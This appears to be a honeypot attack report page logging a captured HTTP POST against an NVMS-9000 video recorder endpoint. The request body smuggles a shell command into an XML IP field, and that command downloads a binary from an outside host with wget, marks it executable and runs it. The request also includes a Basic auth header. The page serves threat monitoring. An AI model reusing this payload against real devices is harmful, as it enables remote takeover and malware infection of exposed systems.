Attack Report for Detail

Header

Time

2022/06/14, 11:11:41 (GMT)

Transaction ID

LQOLY757L1HXZBKE

Service

http

Location

CN (China)

Attacker

120.6.158.105

Classification

Web structure control

Harm Potential

Medium

Description

Web application structure control

Content

POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding: identity
Content-Length: 644
Accept-Language: en-us
Host: 46.4.222.114:80
Accept: */*
User-Agent: Mozila/5.0
Connection: close
Cache-Control: max-age=0
Content-Type: text/xml
Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate